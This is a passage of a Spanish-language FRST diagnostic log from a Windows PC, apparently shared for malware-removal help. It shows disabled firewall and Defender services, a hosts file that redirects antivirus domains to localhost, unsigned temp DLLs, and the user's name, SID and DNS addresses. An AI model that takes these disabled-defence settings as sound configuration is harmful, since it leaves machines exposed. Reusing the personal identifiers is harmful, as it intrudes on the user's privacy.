ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1: [Zeon.MFCDirectShellExt] -> {353C642C-F13D-4699-9FF2-EFAF490B6C69} => C:\Program Files (x86)\Nuance\PDF Professional 7\bin\DirectShellExt.dll [2010-07-16] (Zeon Corporation -> Zeon International Investment Corp. )
ContextMenuHandlers2-x32: [Ulead UDF Driver] -> {DBD8E168-244D-448C-9922-25508950D1DC} => C:\Program Files (x86)\Common Files\Ulead Systems\DVD\USIShex.dll [2005-03-02] (Ulead Systems, Inc.) [Archivo no firmado]
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov) [Archivo no firmado]
ContextMenuHandlers4: [EDSshellExt] -> {29FF7AB0-BE34-4992-A30B-53A9D86EE239} => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64\mwlshellext.dll [2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
ContextMenuHandlers4: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files (x86)\PowerISO\PWRISOSH.DLL [2009-07-26] (PowerISO Computing, Inc.) [Archivo no firmado]
ContextMenuHandlers4-x32: [SimpleShlExt] -> {A53118EA-E89E-49BD-AB1B-AB180BB12CFE} => C:\Program Files (x86)\Clarus\Samsung Auto Backup\ShContextMenu.dll [2010-07-28] (Clarus, Inc.) [Archivo no firmado]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2009-09-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [EDPShell] -> {58549232-7081-4541-882C-767DB238453C} => C:\Program Files\ExamDiff Pro\EDPShell.dll [2016-03-25] (PrestoSoft -> PrestoSoft LLC) [Archivo no firmado]
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files (x86)\PowerISO\PWRISOSH.DLL [2009-07-26] (PowerISO Computing, Inc.) [Archivo no firmado]
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (win.rar GmbH -> Alexander Roshal)

Marco · 27 Marzo, 2020 01:29

==================== Codecs (Lista blanca) ====================

(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)

HKLM\...\Drivers32: [VIDC.FICV] => C:\Windows\system32\ficvdec_x64.dll [652288 2013-05-07] () [Archivo no firmado]
HKLM\...\Drivers32: [vidc.i420] => C:\Windows\SysWOW64\i420vfw.dll [70656 2004-01-24] (www.helixcommunity.org) [Archivo no firmado]
HKLM\...\Drivers32: [msacm.dvacm] => C:\Program Files (x86)\Common Files\Ulead Systems\VIO\DVACM.acm [32768 2006-03-06] (Ulead Systems, Inc.) [Archivo no firmado]
HKLM\...\Drivers32: [msacm.MPEGacm] => C:\Program Files (x86)\Common Files\Ulead Systems\MPEG\MPEGACM.acm [69632 2004-07-23] (Ulead Systems, Inc.) [Archivo no firmado]
HKLM\...\Drivers32: [msacm.ulmp3acm] => C:\Program Files (x86)\Common Files\Ulead Systems\MPEG\ulmp3acm.acm [319488 2006-01-23] (Ulead systems) [Archivo no firmado]
HKLM\...\Drivers32: [VIDC.FICV] => C:\Windows\SysWOW64\ficvdec_x86.dll [641024 2013-05-07] () [Archivo no firmado]
HKLM\...\Drivers32-x32: [vidc.XVID] => xvidvfw.dll
HKLM\...\Drivers32-x32: [VIDC.VP80] => vp8vfw.dll

==================== Accesos directos & WMI ========================

(Las entradas pueden ser listadas para ser restauradas o eliminadas.)

ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplicaciones de Chrome\Twitter.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe (Google LLC) ->  --profile-directory="Profile 1" --app-id=jgeocpdicgmkeemopbanhokmhcgcflmi
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Marco - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Profile 1"
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%
ShortcutWithArgument: C:\Users\Public\Desktop\Acer Accessorios.lnk -> C:\Program Files\Acer Accessory Store\StartURL.exe () -> hxxp://store.acer-euro.com/es?utm_source=Icon&utm_medium=Icon&utm_campaign=Acer%2BInternal

==================== Módulos cargados (Lista blanca) =============

2017-04-01 22:23 - 2016-07-21 10:54 - 000137728 _____ () [Archivo no firmado] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2017-04-01 22:23 - 2016-10-08 17:03 - 001506304 _____ () [Archivo no firmado] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2018-05-05 02:32 - 2016-07-21 09:54 - 000137728 _____ () [Archivo no firmado] C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\CBSCreateVC.dll
2018-05-05 02:32 - 2017-09-12 09:34 - 001506304 _____ () [Archivo no firmado] C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\DAQExp.dll
2008-09-28 18:55 - 2008-09-28 18:55 - 001076224 _____ () [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\ACE.dll
2009-02-02 18:33 - 2009-02-02 18:33 - 000460199 _____ () [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\sqlite3.dll
2012-06-18 09:24 - 2012-06-18 09:24 - 000222720 _____ () [Archivo no firmado] C:\Program Files (x86)\Notepad++\NppShell_05.dll
2017-08-11 22:05 - 2017-07-26 09:16 - 000029696 _____ () [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\WinDivert.dll
2020-03-26 18:40 - 2020-03-26 18:40 - 000876544 _____ () [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-OCJQN.tmp\MouliaLeFil.tmp
2020-03-26 18:41 - 2008-07-23 20:37 - 000203264 _____ () [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-Q7DRE.tmp\itdownload.dll
2017-09-08 17:39 - 2018-11-10 20:15 - 000004096 _____ () [Archivo no firmado] C:\Windows\[email protected]
2017-08-26 15:53 - 2013-08-23 12:36 - 000721263 _____ () [Archivo no firmado] C:\Windows\SysWOW64\AiCM64.dll
2017-04-09 19:33 - 2017-07-26 09:15 - 000537088 _____ (FreeDownloadManager.org) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\common.dll
2008-12-03 19:05 - 2008-12-03 19:05 - 000071680 _____ (Hewlett-Packard) [Archivo no firmado] c:\windows\system32\hpzinw12.dll
2008-12-03 19:05 - 2008-12-03 19:05 - 000089600 ____N (Hewlett-Packard) [Archivo no firmado] c:\windows\system32\hpzipm12.dll
2010-11-18 20:08 - 2010-11-18 20:08 - 000086016 _____ (Igor Pavlov) [Archivo no firmado] C:\Program Files\7-Zip\7-zip.dll
2009-12-01 07:50 - 2009-06-04 12:05 - 000077824 _____ (Intel Corporation) [Archivo no firmado] C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\ESP\IAAMon_ESP.dll
2009-12-01 07:50 - 2009-06-04 12:04 - 000126976 _____ (Intel Corporation) [Archivo no firmado] C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\ESP\PlugInRAID_ESP.dll
2009-12-01 07:50 - 2009-06-04 11:55 - 000208896 _____ (Intel Corporation) [Archivo no firmado] C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\ISDI.dll
2002-02-14 14:00 - 2002-02-14 14:00 - 000024576 _____ (Microsoft Corporation) [Archivo no firmado] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\3082\mdmui.dll
2008-06-05 11:57 - 2008-06-05 11:57 - 001047552 _____ (Microsoft Corporation) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\MFC71U.DLL
2008-06-05 11:57 - 2008-06-05 11:57 - 000499712 _____ (Microsoft Corporation) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\MSVCP71.dll
2008-06-05 11:57 - 2008-06-05 11:57 - 000348160 _____ (Microsoft Corporation) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\MSVCR71.dll
2019-03-27 23:48 - 2019-03-27 23:48 - 000115200 _____ (Microsoft Corporation) [Archivo no firmado] C:\Windows\Microsoft.Net\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll
2020-03-26 18:40 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-Q7DRE.tmp\idp.dll
2009-09-23 19:20 - 2009-09-23 19:20 - 000045056 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\agent_stub.dll
2009-09-23 19:26 - 2009-09-23 19:26 - 000400896 ____N (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\ISchedule.DLL
2009-09-23 19:26 - 2009-09-23 19:26 - 000329216 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IShadowS3.dll
2009-09-23 19:23 - 2009-09-23 19:23 - 000012800 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\MUI\0c0a\lang.dll
2009-09-23 19:25 - 2009-09-23 19:25 - 000044544 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\Pehook.DLL
2009-09-23 19:27 - 2009-09-23 19:27 - 000403456 ____N (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\SyncDll.DLL
2009-09-23 19:19 - 2009-09-23 19:19 - 000057856 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\VssAgent.dll
2009-09-23 19:20 - 2009-09-23 19:20 - 000018944 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\WirelessDll.dll
2009-06-17 17:05 - 2009-06-17 17:05 - 000010240 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\SchedulerSvcLOC.dll
2009-07-26 20:41 - 2009-07-26 20:41 - 000220160 _____ (PowerISO Computing, Inc.) [Archivo no firmado] C:\Program Files (x86)\PowerISO\PWRISOSH.DLL
2016-03-25 13:30 - 2016-03-25 13:33 - 000277016 _____ (PrestoSoft -> PrestoSoft LLC) [Archivo no firmado] C:\Program Files\ExamDiff Pro\EDPShell.dll
2020-03-26 11:34 - 2020-03-26 11:34 - 001008128 _____ (Robert Simpson, et al.) [Archivo no firmado] C:\ProgramData\Logic Cramble\x86\SQLite.Interop.dll
2017-04-09 19:33 - 2017-07-26 09:20 - 005664256 _____ (The Qt Company Ltd) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\Qt5Core.dll
2017-04-09 19:33 - 2016-03-03 14:26 - 006019072 _____ (The Qt Company Ltd) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\Qt5Gui.dll
2017-04-09 19:33 - 2016-03-03 14:23 - 001064960 _____ (The Qt Company Ltd) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\Qt5Network.dll
2017-04-09 19:33 - 2016-03-03 14:21 - 000203776 _____ (The Qt Company Ltd) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\Qt5Sql.dll
2017-04-09 19:33 - 2016-03-03 14:32 - 005472768 _____ (The Qt Company Ltd) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\Qt5Widgets.dll
2020-03-26 18:41 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-Q7DRE.tmp\psvince.dll
2017-04-01 22:23 - 2016-10-08 17:04 - 000708608 _____ (Wondershare) [Archivo no firmado] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll
2018-05-05 02:32 - 2017-09-12 09:36 - 000708608 _____ (Wondershare) [Archivo no firmado] C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\CBSProducstInfo.dll

==================== Alternate Data Streams (Lista blanca) ========

(Si una entrada es incluida en el fixlist, solamente los ADS serán eliminados.)

AlternateDataStreams: C:\ProgramData\Temp:0574215C [120]
AlternateDataStreams: C:\ProgramData\Temp:D95ACC7D [135]

==================== Modo Seguro (Lista blanca) ==================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El "AlternateShell" será restaurado.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MpfService => ""="Service"

==================== Asociación (Lista blanca) =================

==================== Internet Explorer sitios de confianza/restringidos ==========

(Si una entrada es incluida en el fixlist, será eliminada del registro.)

IE trusted site: HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts contenido: =========================

(Si es necesario, la directiva Hosts: puede ser incluida en el fixlist para restablecer Hosts.)

2017-11-17 19:06 - 2019-10-03 00:23 - 000010877 ____R C:\Windows\system32\drivers\etc\hosts
127.0.0.1  telemetry.malwarebytes.com
127.0.0.1  skipittok.com
127.0.0.1	gf.tools.avast.com
127.0.0.1	pair.ff.avast.com
127.0.0.1	ipm-provider.ff.avast.com
127.0.0.1	ipm-provider.ff.avast.com
127.0.0.1	ipm-provider.ff.avast.com
127.0.0.1	id.avast.com
127.0.0.1	s5355946.iavs9x.u.avast.com
127.0.0.1	s5355946.ivps9x.u.avast.com
127.0.0.1	s5355946.ivps9tiny.u.avast.com
127.0.0.1	s5355946.vpsnitro.u.avast.com
127.0.0.1	s5355946.vpsnitrotiny.u.avast.com
127.0.0.1	s5355946.iavs5x.u.avast.com
127.0.0.1	v7.stats.avast.com
127.0.0.1	v7.stats.avast.com
127.0.0.1	v7event.stats.avast.com
127.0.0.1	sm00.avast.com
127.0.0.1	submit5.avast.com
127.0.0.1	geoip.avast.com
127.0.0.1	l2932126.iavs9x.u.avast.com
127.0.0.1	l2932126.ivps9x.u.avast.com
127.0.0.1	l2932126.ivps9tiny.u.avast.com
127.0.0.1	l2932126.vpsnitro.u.avast.com
127.0.0.1	l2932126.vpsnitrotiny.u.avast.com
127.0.0.1	l2932126.iavs5x.u.avast.com
127.0.0.1	v7.stats.avast.com
127.0.0.1	v7.stats.avast.com
127.0.0.1	v7event.stats.avast.com
127.0.0.1	sm00.avast.com

Hay 243 más lineas.


2012-05-07 12:19 - 2012-05-07 12:20 - 000000441 _____ C:\Windows\system32\drivers\etc\hosts.ics

==================== Otras Áreas ===========================

(Actualmente no existe una corrección automática para esta sección.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\system32\wbem;C:\PROGRA~2\COMMON~1\ASPENT~1;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0;C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86;C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64;c:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn;c:\Program Files\Microsoft SQL Server\100\Tools\Binn;c:\Program Files\Microsoft SQL Server\100\DTS\Binn;C:\Program Files (x86)\Common Files\Ulead Systems\MPEG;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files (x86)\Common Files\Roxio Shared\DLLShared;C:\Program Files (x86)\Smart Projects\IsoBuster;C:\Program Files (x86)\QuickTime\QTSystem\;c:\Program Files (x86)\Microsoft SQL Server\90\Tools\binn\
HKU\S-1-5-21-1649130365-987012723-906343211-1000\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 10.0.196.141 - 189.198.222.137
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
mpsdrv => El servicio de Firewall de Windows no se está ejecutando.
MpsSvc => El servicio de Firewall de Windows no se está ejecutando.

==================== MSCONFIG/TASK MANAGER elementos deshabilitados ==

(Si una entrada es incluida en el fixlist, será eliminada.)

MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AIPS => 2
MSCONFIG\Services: BstHdAndroidSvc => 3
MSCONFIG\Services: BstHdLogRotatorSvc => 3
MSCONFIG\Services: BstHdPlusAndroidSvc => 3
MSCONFIG\Services: CG6Service => 2
MSCONFIG\Services: CGVPNCliService => 2
MSCONFIG\Services: ExpressVPNService => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 3
MSCONFIG\Services: Http_analyzer_v7_netfilter => 2
MSCONFIG\Services: MBAMService => 2
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: MpsSvc => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: WinDefend => 2
MSCONFIG\Services: ZenMate5Service => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^MARCO AVILA^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^DishAnywherePlayerShortcut.lnk => C:\Windows\pss\DishAnywherePlayerShortcut.lnk.Startup
MSCONFIG\startupfolder: C:^Users^MARCO AVILA^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Recorte de pantalla y Selector de OneNote 2010.lnk => C:\Windows\pss\Recorte de pantalla y Selector de OneNote 2010.lnk.Startup
MSCONFIG\startupfolder: C:^Users^MARCO AVILA^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Samsung Auto Backup Guage.lnk => C:\Windows\pss\Samsung Auto Backup Guage.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: CCleaner Smart Cleaning => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: EgisTecLiveUpdate => "C:\Program Files (x86)\EgisTec Egis Software Update\EgisUpdate.exe"
MSCONFIG\startupreg: ExpressVPNNotificationService => "C:\Program Files (x86)\ExpressVPN\expressvpn-ui\ExpressVPNNotificationServiceStarter.exe"
MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: hpqSRMon => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSRMon.exe
MSCONFIG\startupreg: IDMan => C:\Program Files (x86)\Internet Download Manager\IDMan.exe /onboot
MSCONFIG\startupreg: movavi_videoconverter_agent => "C:\Users\MARCO AVILA\AppData\Roaming\Movavi Video Converter 19 Premium\ConverterAgent.exe"
MSCONFIG\startupreg: mwlDaemon => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\mwlDaemon.exe
MSCONFIG\startupreg: PDF7 Registry Controller => C:\Program Files (x86)\Nuance\PDF Professional 7\RegistryController.exe
MSCONFIG\startupreg: PDFHook => C:\Program Files (x86)\Nuance\PDF Professional 7\pdfpro7hook.exe
MSCONFIG\startupreg: PDVD8LanguageShortcut => "c:\Program Files (x86)\CyberLink\PowerDVD8\Language\Language.exe"
MSCONFIG\startupreg: PWRISOVM.EXE => C:\Program Files (x86)\PowerISO\PWRISOVM.EXE
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RemoteControl8 => "c:\Program Files (x86)\CyberLink\PowerDVD8\PDVD8Serv.exe"
MSCONFIG\startupreg: SmileboxTray => "C:\Users\MARCO AVILA\AppData\Roaming\Smilebox\SmileboxTray.exe"
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: swg => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
MSCONFIG\startupreg: UVS10 Preload => C:\Program Files (x86)\Ulead Systems\Ulead VideoStudio SE DVD\uvPL.exe

==================== Reglas de firewall (Lista blanca) ================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

FirewallRules: [TCP Query User{366F23B0-A93E-4D27-B27D-4C35A39332F0}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe (Ares Development Group) [Archivo no firmado]
FirewallRules: [UDP Query User{773046CB-4887-40F8-98FF-F54E014350F5}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe (Ares Development Group) [Archivo no firmado]
FirewallRules: [TCP Query User{AF830F9F-477D-4255-97FE-0EF0EE55F200}C:\program files (x86)\windows live\messenger\msnmsgr.exe] => (Allow) C:\program files (x86)\windows live\messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{C917BBB9-BA08-4078-8791-8322937FFD69}C:\program files (x86)\windows live\messenger\msnmsgr.exe] => (Allow) C:\program files (x86)\windows live\messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{82E9CFC6-B7F1-4B31-BE71-99752572EEDA}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{79697472-7464-49E5-9290-00A065F43C82}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{E9602492-F37B-4240-89B7-0C70ADE2AA71}] => (Allow) LPort=2869
FirewallRules: [{CFA1B78C-0293-4EC5-83D9-62BEDDB4D8B1}] => (Allow) LPort=1900
FirewallRules: [{67173E6A-BAA6-439D-AB77-C2FE749C1E33}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{BFE4D6F8-9081-4A1C-9456-3D756F608CED}] => (Allow) LPort=2869
FirewallRules: [{D43C1EF5-D2E0-475D-8975-343493D398E5}] => (Allow) LPort=1900
FirewallRules: [{26F2DF09-DEDA-4C43-8887-69F78A6F9CB0}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{0A9103B6-E567-48CD-ABA1-3EB2A1C6A7AB}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe (Ares Development Group) [Archivo no firmado]
FirewallRules: [UDP Query User{204D78B9-4BE4-417F-AB44-1EFB9AB5F18E}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe (Ares Development Group) [Archivo no firmado]
FirewallRules: [{F27355F9-E64C-42A5-8A0E-CEB5F9244A6F}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe (Hewlett-Packard Company -> Hewlett-Packard)
FirewallRules: [{547421D3-D7AA-491A-9433-45EFB8C8A9C2}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{CBF6769F-1DE4-4E7C-8354-72141872CBFF}] => (Allow) LPort=1542
FirewallRules: [{3A8FA1B7-0C8D-4CBD-9DF7-CDFA95A258FE}] => (Allow) LPort=1542
FirewallRules: [{2D4648E6-3E13-4A06-B05F-FC1576F10700}] => (Allow) LPort=53
FirewallRules: [{4513D140-DC13-4D7D-A936-C1D35415CD84}] => (Allow) LPort=1542
FirewallRules: [{327D53F6-CA13-48CE-B0B3-467850291634}] => (Allow) LPort=1542
FirewallRules: [{E8584AE4-943A-4762-AE3C-8600F07B0540}] => (Allow) LPort=53
FirewallRules: [{3B898225-EBA1-4B29-83E8-3344D84E1C64}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{95BDBC3E-EA4E-4D1A-B014-314290E4C259}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{CFC593AB-A208-4022-A242-A49F41139E65}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{5CF3FFBD-64A8-48B9-A708-3E45719BDF50}] => (Allow) LPort=1688
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\FlashGet Network\FlashGet 3\FlashGet3.exe] => Enabled:Flashget3

==================== Puntos de Restauración =========================




==================== Dispositivos defectuosos en el Administrador de dispositivos ============

Name: ExpressVPN TAP Adapter
Description: ExpressVPN TAP Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: ExpressVPN
Service: tapexpressvpn
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Synaptics PS/2 Port TouchPad
Description: Synaptics PS/2 Port TouchPad
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Synaptics
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: WinmonProcessMonitor
Description: WinmonProcessMonitor
